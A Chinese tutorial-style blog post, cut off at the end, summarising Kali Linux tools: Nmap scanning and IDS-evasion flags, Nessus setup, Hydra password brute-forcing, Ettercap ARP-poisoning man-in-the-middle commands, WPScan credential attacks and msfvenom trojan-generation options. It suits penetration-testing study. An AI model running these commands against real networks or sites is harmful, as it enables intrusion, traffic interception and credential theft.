精华内容
下载资源
问答
  • 更新时间:2011-12-8 软件类别:网络工具 - 搜寻引擎 软件大小:110 KB 软件授权:免费版 软件类别:绿色软件 软件语言:简体中文 应用平台:Win9X/2000/XP/2003/ (C#编写 需要framework2.0以上组件)
  • 渗透过程中可能要用到的Kali工具小总结写在最前面最近在搞渗透的时候,发现过程中有一些kali工具还是很适合使用的所以写一个渗透过程中可能用到的kali渗透工具的小小总结写的不对 多多包涵 各位大佬轻喷 :DKali...

    渗透过程中可能要用到的Kali工具小总结

    写在最前面

    最近在搞渗透的时候,发现过程中有一些kali工具还是很适合使用的

    所以写一个渗透过程中可能用到的kali渗透工具的小小总结

    写的不对 多多包涵 各位大佬轻喷 :D

    Kali用得好 牢饭准管饱

    渗透不规范 亲人两行泪

    先来了解一下Kali(From Wikipdeia)

    Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的用于取证的Linux发行版 。

    Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng.[2] 用户可通过硬盘、live CD或live USB运行Kali Linux。Kali Linux既有32位和64位的镜像。可用于x86 指令集。同时还有基于ARM架构的镜像,可用于树莓派和三星的ARM Chromebook

    另外Kali Linux 集成了以下安全软件:

    Metasploit、RFMON、Aircrack-NG、Gerix Wifi Cracker、Kismet、Nmap、Ophcrack、Ethercap、Wireshark (formerly known as Ethereal)、

    BeEF (Browser Exploitation Framework)、Hydra

    OWASP Mantra Security Framework (一套基于FireFox的工具、插件和脚本)

    Cisco OCS Mass Scanner (通过telnet以及默认密码扫描思科路由器)

    exploit 程序比如 浏览器

    BackTrack 工具软件分成12大类:

    Information Gathering(信息收集)

    Vulnerability Assessment(漏洞评定工具)

    Exploitation Tools(开发工具)

    Privilege Escalation(用户提权)

    Maintaining Access(维护登录)

    Reverse Engineering(逆向工程)

    RFID Tools(RFID工具)

    Stress testing(压力测试)

    Forensics(取证)

    Reporting Tools(报告工具)

    Services(服务)

    Miscellaneous(杂项)

    Kali工具:

    一、Nmap(网络映射器 Network Mapper)

    介绍

    Nmap是一款开源免费的网络发现(Network Discovery)和安全审计(Security Auditing)工具。软件名字Nmap是Network Mapper的简称。Nmap最初是由Fyodor在1997年开始创建的。随后在开源社区众多的志愿者参与下,该工具逐渐成为最为流行安全必备工具之一。详情可以参见:www.nmap.org。

    一般情况下,Nmap用于列举网络主机清单、管理服务升级调度、监控主机或服务运行状况。Nmap可以检测目标机是否在线、端口开放情况、侦测运行的服务类型及版本信息、侦测操作系统与设备类型等信息。

    可以作为信息收集工具,收集有关主机的信息;也可以提供防火墙规避和欺骗功能

    Nmap的优点:

    1. 灵活:支持数十种不同的扫描方式,支持多种目标对象的扫描
    2. 强大:Nmap可以用于扫描互联网上大规模的计算机
    3. 可移植:支持主流操作系统:Windows/Linux/Unix/MacOS等等;源码开放,方便移植
    4. 简单:提供默认的操作能覆盖大部分功能,基本端口扫描nmap targetip,全面的扫描nmap –A targetip
    5. 自由:Nmap作为开源软件,在GPL License的范围内可以自由的使用
    6. 文档丰富:Nmap官网提供了详细的文档描述。Nmap作者及其他安全专家编写了多部Nmap参考书籍
    7. 社区支持:Nmap背后有强大的社区团队支持
    8. 赞誉有加:获得很多的奖励,并在很多影视作品中出现(如黑客帝国2、Die Hard4等)
    9. 流行:目前Nmap已经被成千上万的安全专家列为必备的工具之一

    功能及特点

    主机存活检测:探测网络上的主机,例如列出响应TCP和ICMP请求、icmp请求、开放特别端口的主机端口探测:探测目标主机所开放的端口服务识别操作系统识别:探测目标主机的操作系统及网络设备的硬件特性硬件地址检测服务版本识别:探测目标主机的网络服务,判断其服务名称及版本号漏洞扫描,使用nmap自带脚本支持探测脚本的编写:使用Nmap的脚本引擎(NSE)和Lua编程语言
    通过对设备或者防火墙的探测来审计它的安全性探测目标主机所开放的端口网络存储,网络映射,维护和资产管理通过识别新的服务器审计网络的安全性探测网络上的主机

    端口扫描的6种状态:

    open:端口是开放的closed:端口是关闭的filtered:端口被防火墙IDS/IPS屏蔽,无法确定其状态unfiltered:端口没有被屏蔽,但是否开放需要进一步确定open|filtered:端口是开放的或被屏蔽closed|filtered :端口是关闭的或被屏蔽

    简单使用

    默认发送一个arp的ping数据包,用来探测目标主机在1-10000范围内所开放的端口:

    nmap 
    d9d3c7592f5728d70e1172327add7031.png

    对返回的结果详细描述输出

    nmap -vv 
    f7fcf0bd49ff7393f11690a51dbdcd85.png

    通过参数-p 来设置我们将要扫描的端口号:(range为端口扫描的范围 不超过65535)

    nmap -p(range) 
    bf52d27652b9d30ab47ce2e99c134e2e.png

    指定端口扫描:

    nmap -p(port1,port2,port3,...) 

    例如:

    nmap -p80,443,8080 

    使用 ping 扫描:

    nmap -sP 

    路由追踪:

    nmap --traceroute 
    4f4ee40a4a108ac76d0feb6508780239.png

    使用SYN的方法对全端口进行扫描,在aggressive(4)的时间模板下,同时对开放的端口进行端口识别:(SYN是TCP/IP建立连接时使用的握手信号)

    nmap -p1-65535 -sV -sS -T4 

    aggressive(4)时间模板,探测操作系统类型和版本,以及显示traceroute的结果:

    nmap -v -sS -A -T4 nmap -v -p 1-65535 -sV -O -sS -T4 

    insane(5)的时间模板,探测操作系统类型和版本,以及显示traceroute的结果:

    nmap -v -sS -A -T5 nmap -v -sV -O -sS -T5 nmap -v -p 1-65535 -sV -O -sS -T5 

    扫描的结果输出到屏幕,同时会存储一份filename.txt:

    nmap -sV -p 139,445 -oG filename.txt 

    扫描指定的目标主机,同时检测相关漏洞:

    nmap --script-args=unsafe=1 --script smb-check-vulns.nse -p 445 

    使用参数列表

    -iL filename   从文件中读取待检测目标,文件中的表示方法支持机名,ip,网段-iR hostnum    随机选取,进行扫描.如果-iR指定为0,则无休止的扫描--exclude host1[, host2]     扫描任务中需要排除的主机--exculdefile exclude_file   排除文件中的IP,格式和-iL指定扫描文件格式相同

    主机发现:

    -sL                     仅仅显示扫描的IP数目,不会进行任何扫描-sn                     ping扫描,即主机发现-Pn                     不检测是否主机存活-PS/PA/PU/PY[portlist]  TCP SYN Ping/TCP ACK Ping/UDP Ping的发现-PE/PP/PM               使用ICMP echo, timestamp and netmask 请求包来发现主机-PO[prococol list]      使用IP协议包来探测对方主机是否开启-n/-R                   不对IP进行域名反向解析/对所有的IP都进行域名反向解析

    扫描技巧:

    -sS/sT/sA/sW/sM                 TCP SYN/TCP connect()/ACK/TCP窗口扫描/TCP Maimon扫描-sU                             UDP扫描-sN/sF/sX                       TCP Null,FIN,and Xmas扫描--scanflags                     自定义TCP包中的flags(标志位)-sI zombie host[:probeport]     Idlescan-sY/sZ                          SCTP INIT/COOKIE-ECHO 扫描-sO                             使用IP protocol 扫描确定目标机所支持的协议类型-b “FTP relay host”             使用FTP bounce scan

    指定端口和扫描顺序:

    -p                      扫描特定的端口 -p80,443 或者 -p1-65535-p U:PORT               扫描udp的某个端口, -p U:53-F                      快速扫描模式,比默认的扫描端口要少-r                      不随机扫描端口,默认是随机扫描--top-ports "number"    扫描开放概率最高的number个端口,出现的概率需要参考nmap-services文件,ubuntu中该文件位于/usr/share/nmap.nmap默认扫前1000个--port-ratio "ratio"    扫描指定频率以上的端口

    服务版本的识别:

    -sV                             开放版本探测,可以直接使用-A同时打开操作系统探测和版本探测--version-intensity "level"     设置版本扫描强度,强度水平说明了应该使用哪些探测报文。数值越高,服务越有可能被正确识别。默认是7--version-light                 打开轻量级模式,为--version-intensity 2的别名--version-all                   尝试所有探测,为--version-intensity 9的别名--version-trace                 显示出详细的版本侦测过程信息

    使用脚本扫描:

    -sC                             根据端口识别的服务,调用默认脚本--script=”Lua scripts”          需要调用的脚本名--script-args=n1=v1,[n2=v2]     调用脚本传递的参数--script-args-file=filename     使用文本传递参数--script-trace                  显示所有发送和接收到的数据--script-updatedb               更新脚本的数据库--script-help=”Lua script”      显示指定脚本的帮助选项

    OS识别:

    -O              启用操作系统检测,-A来同时启用操作系统检测和版本检测--osscan-limit  针对指定的目标进行操作系统检测(至少确知该主机分别有一个open和closed的端口)--osscan-guess  推测操作系统检测结果,当Nmap无法确定所检测的操作系统时,会尽可能地提供最相近的匹配,Nmap默认进行匹配

    防火墙/IDS躲避和哄骗:

    -f; --mtu value                 指定使用分片、指定数据包的MTU.-D decoy1,decoy2,ME             使用诱饵隐蔽扫描-S IP-ADDRESS                   源地址欺骗-e interface                    使用指定的接口-g/ --source-port PROTNUM       使用指定源端口  --proxies url1,[url2],...       使用HTTP或者SOCKS4的代理 --data-length NUM               填充随机数据让数据包长度达到NUM--ip-options OPTIONS            使用指定的IP选项来发送数据包--ttl VALUE                     设置IP time-to-live域--spoof-mac ADDR/PREFIX/VEBDOR  MAC地址伪装--badsum                        使用错误的checksum来发送数据包

    选择输出格式:

    -oN                     将标准输出直接写入指定的文件-oX                     输出xml文件-oS                     将所有的输出都改为大写-oG                     输出便于通过bash或者perl处理的格式,非xml-oA BASENAME            可将扫描结果以标准格式、XML格式和Grep格式一次性输出-v                      提高输出信息的详细度-d level                设置debug级别,最高是9--reason                显示端口处于带确认状态的原因--open                  只输出端口状态为open的端口--packet-trace          显示所有发送或者接收到的数据包--iflist                显示路由信息和接口,便于调试--log-errors            把日志等级为errors/warings的日志输出--append-output         追加到指定的文件--resume FILENAME       恢复已停止的扫描--stylesheet PATH/URL   设置XSL样式表,转换XML输出--webxml                从namp.org得到XML的样式--no-sytlesheet         忽略XML声明的XSL样式表

    其他选项:

    -6                      开启IPv6-A                      OS识别,版本探测,脚本扫描和traceroute--datedir DIRNAME       说明用户Nmap数据文件位置--send-eth / --send-ip  使用原以太网帧发送/在原IP层发送--privileged            假定用户具有全部权限--unprovoleged          假定用户不具有全部权限,创建原始套接字需要root权限-V                      打印版本信息-h                      输出帮助

    高级用法

    防火墙/IDS规避:

    防火墙与IDS规避为用于绕开防火墙与IDS(入侵检测系统)的检测与屏蔽,以便能够更加详细地发现目标主机的状况

    Nmap提供了多种规避技巧,通常可以从两个方面考虑规避方式:数据包的变换(Packet Change)与时序变换(Timing Change)

    规避用法:

    -f; --mtu :                指定使用分片、指定数据包的MTU-D :    用一组IP地址掩盖真实地址,其中ME填入自己的IP地址-S :                伪装成其他IP地址-e :                     使用特定的网络接口-g/--source-port :     使用指定源端口--data-length :            填充随机数据让数据包长度达到Num--ip-options :         使用指定的IP选项来发送数据包--ttl :                    设置time-to-live时间--spoof-mac :      伪装MAC地址--badsum:                       使用错误的checksum来发送数据包(正常情况下,该类数据包被抛弃,如果收到回复,说明回复来自防火墙或IDS/IPS)

    例子:

    -F表示快速扫描100个端口;-Pn表示不进行Ping扫描;-D表示使用IP诱骗方式掩盖自己真实IP(其中ME表示自己IP);-e eth0表示使用eth0网卡发送该数据包;-g 3355表示自己的源端口使用3355;192.168.1.1是被扫描的目标IP地址

    nmap -v -F -Pn -D192.168.1.100,192.168.1.102,ME -e eth0 -g 3355 192.168.1.1

    绝招:

    man Nmap

    参考:

    0x00

    0x01

    二、Nessus(系统弱点扫描分析软件)

    介绍

    Nessus号称是世界上最流行的漏洞扫描程序,全世界有超过75000个组织在使用它。该工具提供完整的电脑漏洞扫描服务,并随时更新其漏洞数据库。Nessus不同于传统的漏洞扫描软件,Nessus可同时在本机或远端上遥控,进行系统的漏洞分析扫描。Nessus也是渗透测试重要工具之一,可以帮助找到潜在攻击者可能利用的漏洞,Nessus通常包括成千上万的最新的漏洞,各种各样的扫描选项,及易于使用的图形界面和有效的报告

    为了定位在目标系统上的漏洞,Nessus依赖feeds的格式实现漏洞检查

    特点介绍:

    提供完整的电脑漏洞扫描服务,并随时更新其漏洞数据库不同于传统的漏洞扫描软件。Nessus可同时在本机或远程控制,进行系统的漏洞分析扫描其运作效能随着系统的资源而自行调整。如果将主机配置更多的资源(如加快CPU速度或增加内存大小),其效率表现可因为丰富资源而提高可自行定义插件NASL(Nessus Attack Scripting Language)是由Tenable所发出的语言,用来写入Nessus的安全测试选项完全支持SSL(Secure Socket Layer)

    官网下载地址

    关于Kali安装Nessus就不说了安装教程

    简单使用方法

    先启动Nessus服务

    /etc/init.d/nessusd startStarting Nessus:

    然后去https://kali:8834/ Nessus登录界面 输入账号登录

    c58da60d9db4b4eed171673fcd91ac6c.png

    Nessus 主界面

    c1da5ac231617f03c6a1dd86a3f8f374.png

    主页面右侧点击Policies 进入后点击右上角 New Policy 出现如下图

    d556a3c203d061147b1f2dc6259319da.png

    该界面选择创建策略类型。Nessus默认支持10种策略类型。这里随便选个 Advanced Scan 进入后

    3c135c451501bc22f5acdfdc50bc8e99.png

    在该界面设置策略名、可见性和描述信息(可选项) 右侧边条对应选项可选择设置多个选项

    选择插件程序点击Plugins

    42fcad6919421f768e53928e19b09fb4.png

    该界面显示了所有插件程序,默认全部是启动的。在该界面可以单击Disable All按钮,禁用所有启动的插件程序。然后指定需要启动的插件程序,即可启动,再次点击绿色按钮即可禁用

    在扫描策略设置好以后,需新建扫描任务才能开始扫描漏洞

    切回主界面 点击Scans 右上角New Scan 建立新扫描任务

    c4fd39593c6f647cdde054f7b7768b97.png

    在该界面设置扫描任务名称、使用策略、文件夹和扫描的目标。这里分别设置为Sample Scan、Policy(之前建立好的策略)、My Scans和192.168.41.0/24。然后单击Launch

    扫描网络漏洞

    如果用户想要使用Nessus攻击一个大范围的漏洞,需要配置评估漏洞列表并指定获取信息的评估列表。下面介绍配置Nessus在目标主机寻找网络漏洞,这些漏洞指目标主机或其他网络协议

    1.新建一个名为 NetWork Scan 的策略

    2.在策略中添加所需要的插件程序

    CISCO                   扫描CISCO系统DNS                     扫描DNS服务器Default Unix Accounts   扫描本地默认用户账户和密码FTP                     扫描FTP服务器Firewalls               扫描代理防火墙Gain a shell remotely   扫描远程获取的ShellGeeral                  扫描常用的服务Netware                 扫描网络操作系统Peer-To-Peer File Sharing   扫描共享文件检测Policy Compliance           扫描PCI DSS和SCAP信息SCADA                       扫描设置管理工具SMTP Problems               扫描SMTP问题SNMP                        扫描SNMP相关信息Service Detection           扫描服务侦察Settings                扫描基本设置

    3.在主界面新建一个扫描任务 开始扫描

    4.扫描完成后查看扫描报告,如发现漏洞想详细分析可以到处文件具体分析

    扫描指定的linux系统漏洞

    接下来介绍使用Nessus扫描指定Linux系统上的漏洞

    常规步骤 给一下需要添加的插件程序:

    Backdoors                       扫描秘密信息Brute Force Attacks             暴力攻击CentOSo Local Security Checks   扫描CentOS系统的本地安全漏洞DNS                             扫描DNS服务器Debian Local Security Checks    扫描Debian系统的本地安全漏洞Default Unix Accounts           扫描默认Unix用户账号Denial of Service               扫描拒绝的服务FTP                             扫描FTP服务器Fedora Local Security Checks    扫描Fedora系统的本地安全漏洞Firewalls                       扫描防火墙FreeBSD Local Security Checks   扫描FreeBSD系统的本地安全漏洞Gain a shell remotely           扫描远程获得的ShellGeneral                         扫描漏洞Gentoo Local Security Checks    扫描Gentoo系统的本地安全漏洞HP-UX Local Security Checks     扫描HP-UX系统的本地安全漏洞Mandriva Local Security Checks  扫描Mandriva系统的本地安全漏洞Misc                            扫描复杂的漏洞Red Hat Local Security Checks   扫描Red Hat系统的本地安全漏洞SMTP Porblems                   扫描SMTP问题SNMP                            扫描SNMP漏洞Scientific Linux Local Security Checks  扫描Scientific Linux系统的本地安全漏洞Slackware Local Security Checks 扫描Slackware系统的本地安全漏洞Solaris Local Security Checks   扫描Solaris系统的本地安全漏洞SuSE Local Security Checks      扫描SuSE系统的本地安全漏洞Ubuntu Local Security Checks    扫描Ubuntu系统的本地安全漏洞Web Servers                     扫描Web服务器

    扫描指定的windows系统漏洞

    给出需要添加的插件程序:

    DNS                         扫描DNS服务器Databases                   扫描数据库Denial of Service           扫描拒绝的服务FTP                         扫描FTP服务器SMTP Problems               扫描SMTP问题SNMP                        扫描SNMPSettings                    扫描设置信息Web Servers                 扫描Web ServersWindows                     扫描WindowsWindows:Microsoft Bulletins 扫描Windows中微软公告Windows:User management     扫描Windows用户管理

    三、Hydra+Ettercap(密码破解+中间人攻击)

    hydra(密码破解)

    Hydra是一个相当强大的暴力密码破解工具。该工具支持几乎所有协议的在线密码破解,如FTP、HTTP、HTTPS、MySQL、MS SQL、Oracle、Cisco、IMAP和VNC等。其密码能否被破解,关键在于字典是否足够强大

    经过测试,可以在Linux,Windows / Cygwin,Solaris,FreeBSD / OpenBSD,QNX(Blackberry 10)和MacOS上进行干净的编译

    目前该工具支持以下协议:Asterisk,AFP,Cisco AAA,Cisco auth,Cisco enable,CVS,Firebird,FTP,HTTP-FORM-GET,HTTP-FORM-POST,HTTP-GET,HTTP-HEAD,HTTP-POST ,HTTP-PROXY,HTTPS-FORM-GET,HTTPS-FORM-POST,HTTPS-GET,HTTPS-HEAD,HTTPS-POST,HTTP-Proxy,ICQ,IMAP,IRC,LDAP,MEMCACHED,MONGODB,MS-SQL,MYSQL ,NCP,NNTP,Oracle侦听器,Oracle SID,Oracle,PC-Anywhere,PCNFS,POP3,POSTGRES,Radmin,RDP,Rexec,Rlogin,Rsh,RTSP,SAP / R3,SIP,SMB,SMTP,SMTP枚举,SNMP v1 + v2 + v3,SOCKS5,SSH(v1和v2),SSHKEY,Subversion,Teamspeak(TS2),Telnet,VMware-Auth,VNC和XMPP

    支持的平台:

    1.所有UNIX平台(Linux,* BSD,Solaris等)2.MacOS(基本上是BSD克隆)3.带Cygwin的Windows(IPv4和IPv6)4.基于Linux,MacOS或QNX的移动系统(例如Android,iPhone,Blackberry     10,Zaurus,iPaq)

    此工具在Kali上有图形界面版 如下

    点击应用程序 搜索框搜索hydra 打开hydra-gtk

    549139eb0c4d0db721a6292e14e18851.png

    该界面用于设置目标系统的地址、端口和协议等。如果要查看密码攻击的过程,将Output Options框中的Show Attempts复选框勾上

    进入Password界面

    5cf04c66ce005b7e8f63667f614d3d8f.png

    /usr/share/wfuzz/wordlist/others/names.txt

    /usr/share/wfuzz/wordlist/others/common_pass.txt

    在该界面指定用户名和密码列表文件,这里使用Kali系统中存在的用户名和密码列表文件,并选择Loop around users选项。其中,用户名和密码文件分别保存在/usr/share/wfuzz/wordlist/others/names.txt和/usr/share/wfuzz/wordlist/others/common_pass.txt中

    设置好密码字典后,单击Tuning选项

    在该界面设置任务的编号和超时时间。如果运行任务太多的话,服务的响应速率将下降。所以要建议将原来默认的任务编号16修改为2,超时时间修改为15。然后将Exit after first found pair的复选框勾上,表示找到第一对匹配项时则停止攻击

    3d13cfdd947c0ebe05a766f4029d85ca.png

    进行start界面 在该界面显示了四个按钮,分别是启动、停止、保存输出和清除输出。这里单击Start按钮开始攻击

    e482029127ded1c92a7d149c56b34013.png

    xHydra工具根据自定的用户名和密码文件中的条目,进行匹配。当找到匹配的用户名和密码时,则停止攻击 密码字典越强大越好

    Hydra Github

    Ettercap(网络嗅探)

    介绍

    官网 Github

    官网介绍:Ettercap是针对中间人攻击的综合套件。它具有实时连接的嗅探,动态内容过滤和许多其他有趣的技巧。它支持许多协议的主动和被动剖析,并包括许多用于网络和主机分析的功能(内网渗透神器)

    也是Linux下一个强大的欺骗工具,也适用于Windows。用户能够使用Ettercap工具快速地创建伪造的包,实现从网络适配器到应用软件各种级别的包,绑定监听数据到一个本地端口等

    中间人攻击

    中间人攻击(Man-in-the-MiddleAttack,简称“MITM攻击”)是一种“间接”的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间,这台计算机就称为“中间人”

    中间人攻击常见的两种方法:ARP欺骗、DNS欺骗

    Ettercap使用(中英文对照)

    Usage: ettercap [OPTIONS] [TARGET1] [TARGET2]用法:ettercap  <>TARGET is in the format MAC/IP/PORTs (see the man for further detail)TARGET 的格式: MAC地址/IP地址/端口号Sniffing and Attack options:  -M, --mitm     perform a mitm attack                              实施中间人攻击  -o, --only-mitm             don't sniff, only perform the mitm attack                                                         不进行网络嗅探,只进行中间人攻击  -b, --broadcast             sniff packets destined to broadcast                                                               嗅探地址是广播地址的数据包  -B, --bridge         use bridged sniff (needs 2 ifaces)                              使用桥接嗅探(需要两个网卡)  -p, --nopromisc             do not put the iface in promisc mode                                                             不要将网卡设置成混杂模式  -S, --nosslmitm             do not forge SSL certificates                              禁用SSL证书伪造  -u, --unoffensive           do not forward packets                              不转发数据包  -r, --read            read data from pcapfile                               从pcap文件读取数据  -f, --pcapfilter    set the pcap filter                               设置pcap过滤器  -R, --reversed              use reversed TARGET matching                              反向选择目标  -t, --proto          sniff only this proto (default is all)                                                           选择一个协议进行嗅探      --certificate     certificate file to use for SSL MiTM                                                             用于SSL中间人攻击的证书文件      --private-key     private key file to use for SSL MiTM                                                             用于SSL中间人攻击的私钥文件User Interface Type:  -T, --text                  use text only GUI 文本模式  -q, --quiet                 do not display packet contents                              安静模式 不输出过多无用信息  -s, --script           issue these commands to the GUI                              将命令发送到GUI  -C, --curses                use curses GUI                              基于curse的GUI  -D, --daemon                daemonize ettercap (no GUI)                              守护进程  -G, --gtk                   use GTK+ GUI 使用GUI界面Logging options:  -w, --write           write sniffed data to pcapfile                                                             把嗅探到的数据写入文件中  -L, --log          log all the traffic to this                                                             记录所有流量数据到指定文件中  -l, --log-info     log only passive infos to this                                                          仅记录被动信息到指定文件  -m, --log-msg      log all the messages to this                                                            把所有消息记录到指定文件中  -c, --compress              use gzip compression on log files                              对日志文件使用gzip压缩Visualization options:  -d, --dns                   resolves ip addresses into hostnames                                                             将IP地址解析为地址名  -V, --visual        set the visualization format                              设置可视化格式  -e, --regex          visualize only packets matching this regex                                                       仅显示与此正则表达式匹配的数据包  -E, --ext-headers           print extended header for every pck                                                              打印每一个pck的扩展头  -Q, --superquiet            do not display user and password                              禁止显示用户名和密码General options:  -i, --iface          use this network interface                              手动选择网卡 后面跟网卡参数  -I, --liface                show all the network interfaces                              列出所有可用网卡列表  -Y, --secondary     list of secondary network interfaces                                                             展示辅助网络接口列表  -n, --netmask      force this  on iface                              设置子网掩码  -A, --address      force this local  on iface                                                              选择手动设置IP地址 在某个端口上  -P, --plugin        launch this  加载插件  -F, --filter          load the filter  (content filter)                                                          加载过滤器文件  -z, --silent                do not perform the initial ARP scan                                                              禁用初始化ARP扫描  -j, --load-hosts      load the hosts list from                               从指定文件加载主机列表  -k, --save-hosts      save the hosts list to                               将主机列表保存到指定文件  -W, --wifi-key        use this key to decrypt wifi packets (wep or wpa)                                                加载WIFI密码  -a, --config        use the alterative config file                                                           使用备用配置文件Standard options:  -v, --version               prints the version and exit  -h, --help                  

    简单使用示例:

    1.在控制台模式下(-T)不使用混杂模式(-p),只会看到自己的通信

    ettercap -Tp

    2.在控制台模式下(-T),不使用ARP初始化(-z),不显示数据包内容(-q安静模式),但是会显示用户名和密码和其他消息

    ettercap -Tzq

    3.在控制台模式下(-T),加载主机列表(-j),对目标执行arp毒化中间人攻击(-M arp)

    ettercap -T -j /tmp/victims -M arp /10.0.0.1-7/ /10.0.0.10-20/

    4.在控制台模式下(-T),对整个局域网执行ARP毒化攻击(-M arp)

    ettercap -T -M arp // //

    5.在控制台模式下(-T),执行ARP双向欺骗(-M arp:remote)

    ettercap -T -M arp:remote /192.168.1.1/ /192.168.1.2-10/

    6.在控制台模式下(-T),不使用ARP初始化(-z),使用安静模式(-q),监听所有主机110端口(pop3协议端口)

    ettercap -Tzq //110

    7.在控制台模式下(-T),不进行ARP初始化(-z),使用安静模式(-q),监听目标10.0.0.1的21,22,23端口(FTP、SSH、TELNET)

    ettercap -Tzq /10.0.0.1/21,22,23

    8.打印输出可用插件列表

    ettercap -P list

    9.使用过滤脚本

    etterfilter test.filter -o test.ef

    关于插件

    Available plugins :         arp_cop  1.1  Report suspicious ARP activity         autoadd  1.2  Automatically add new victims in the target range      chk_poison  1.1  Check if the poisoning had success       dns_spoof  1.2  Sends spoofed dns replies      dos_attack  1.0  Run a d.o.s. attack against an IP address           dummy  3.0  A plugin template (for developers)       find_conn  1.0  Search connections on a switched LAN   find_ettercap  2.0  Try to find ettercap activity         find_ip  1.0  Search an unused IP address in the subnet          finger  1.6  Fingerprint a remote host   finger_submit  1.0  Submit a fingerprint to ettercap's website  fraggle_attack  1.0  Run a fraggle attack against hosts of target one       gre_relay  1.0  Tunnel broker for redirected GRE tunnels     gw_discover  1.0  Try to find the LAN gateway         isolate  1.0  Isolate an host from the lan       link_type  1.0  Check the link type (hub/switch)      mdns_spoof  1.0  Sends spoofed mDNS replies      nbns_spoof  1.1  Sends spoof NBNS replies & sends SMB challenges with custom challenge    pptp_chapms1  1.0  PPTP: Forces chapms-v1 from chapms-v2      pptp_clear  1.0  PPTP: Tries to force cleartext tunnel        pptp_pap  1.0  PPTP: Forces PAP authentication      pptp_reneg  1.0  PPTP: Forces tunnel re-negotiation      rand_flood  1.0  Flood the LAN with random MAC addresses  remote_browser  1.2  Sends visited URLs to the browser       reply_arp  1.0  Simple arp responder    repoison_arp  1.0  Repoison after broadcast ARP   scan_poisoner  1.0  Actively search other poisoners  search_promisc  1.2  Search promisc NICs in the LAN       smb_clear  1.0  Tries to force SMB cleartext auth        smb_down  1.0  Tries to force SMB to not use NTLM2 key auth    smurf_attack  1.0  Run a smurf attack against specified hosts        sslstrip  1.1  SSLStrip plugin     stp_mangler  1.0  Become root of a switches spanning tree

    Ettercap部分参考

    四、WPScan(WordPress漏洞扫描程序)

    工具介绍

    官网地址 GitHub

    WordPress是一款免费的,用于非商业用途的黑匣子WordPress漏洞扫描程序,专为安全专业人员和博客维护人员编写,用于测试其网站的安全性

    Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括主题漏洞、插件漏洞和WordPress本身的漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。它不仅能够扫描类似robots.txt这样的敏感文件,还可以实现获取站点用户名,获取安装的所有插件、主题,以及存在漏洞的插件、主题,并提供漏洞信息。同时还可以实现对未加防护的Wordpress站点暴力破解用户名密码

    edde15e18dd584cbe393b1b096b42e4a.png

    简单使用

    wpscan -update                            更新漏洞库wpscan --url www.target.com --enumerate p 扫描插件基本信息wpscan --url www.xxx.com --enumerate vp   扫描容易受攻击的插件wpscan --url www.xxx.com --enumerate ap   扫描所有插件wpscan --url www.target.com --enumerate u 暴力枚举用户名wpscan --url www.example.com --wordlist passX.txt --username admin                                     通过用户名字典爆破密码wpscan --url www.example.com --wordlist darkc0de.lst --threads 50                                       使用字典调用50个线程进行暴力破解wpscan --helpwpscan --random-agent                    带着浏览器头访问wpscan             开始对服务器进行扫描wpscan  --enumerate t  对使用主题进行扫描wpscan  --enumerate vt 扫描主题中存在的漏洞wpscan  -e at -e ap -e u  枚举扫描主题、插件、用户名wpscan –url [wordpress url] –wordlist [path to wordlist] –username [username to brute force] –threads [number of threads to use]                                暴力破解用户的root密码

    参数选项

    --update                更新数据库--url | -u  配置扫描URL--force | -f            强制让wpscan不要验证目标是否是wordpress--enumerate | -e [option(s)] 枚举信息选项:-u           枚举用户名,默认从1-10-u[10-20]    枚举用户名,配置从10-20-p           枚举插件--vp         只枚举有漏洞的插件--ap         枚举所有插件,时间较长--tt         列举缩略图相关的文件-t           枚举主题信息--vt         只枚举存在漏洞的主题--at         枚举所有主题,时间较长可以指定多个扫描选项,例:"-e tt,p"如果没有指定选项,默认选项为:"vt,tt,u,vp"--exclude-content-based ""当使用枚举选项时,可以使用该参数做一些过滤,基于正则或者字符串,可以不写正则分隔符,但要用单引号或双引号包裹--config-file | -c       使用指定的配置文件--user-agent | -a         指定User-Agent--cookie                      指定cookie--random-agent | -r                   使用随机User-Agent--follow-redirection                  如果目标包含一个重定向,则直接跟随跳转--batch                               无需用户交互,都使用默认行为--no-color                            不要采用彩色输出--wp-content-dir  WPScan  会去发现wp-content目录,用户可手动指定--wp-plugins-dir          指定wp插件目录,默认是wp-content/plugins--proxy           设置一个代理,可以使用HTTP、SOCKS4、SOCKS4A、SOCKS5,              如果未设置默认是HTTP协议--proxy-auth     设置代理登陆信息--basic-auth     设置基础认证信息--wordlist | -w           指定密码字典--username | -U           指定爆破的用户名--usernames           指定爆破用户名字典--threads | -t   指定多线程--cache-ttl              设置 cache TTL.--request-timeout  请求超时时间--connect-timeout  连接超时时间--max-threads          最大线程数--throttle            当线程数设置为1时,设置两个请求之间的间隔--help | -h                         输出帮助信息--verbose | -v                      输出Verbose--version                           输出当前版本
    非入侵式检测:wpscan -u www.example.com吧默认选项枚举信息:wpscan -u www.example.com -e枚举插件信息:wpscan -u www.example.com -e p爆破用户名admin的密码:wpscan -u www.example.com --wordlist darkc0de.lst --username admin --threads 50

    参考

    五、Metasploit Framework

    工具介绍

    官网 GitHub

    Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名

    msfvenom(用于生成木马文件)

    f5578bf0128bb0a488bb883db1d2927e.png
    -p, --payload           指定需要使用的payload(攻击荷载)-l, --list       [module_type]   列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all-n, --nopsled            为payload预先指定一个NOP滑动长度-f, --format             指定输出格式 (使用 --help-formats                                  来获取msf支持的输出格式列表)-e, --encoder    [encoder]       指定需要使用的encoder(编码器)-a, --arch         指定payload的目标架构    --platform         指定payload的目标平台-s, --space              设定有效攻击荷载的最大长度-b, --bad-chars            设定规避字符集,比如:                                             'x00xff'-i, --iterations          指定payload的编码次数-c, --add-code             指定一个附加的win32 shellcode文件-x, --template             指定一个自定义的可执行文件作为模板-k, --keep                       保护模板程序的动作,注入的payload作                                 为一个新的进程运行    --payload-options            列举payload的标准选项-o, --out           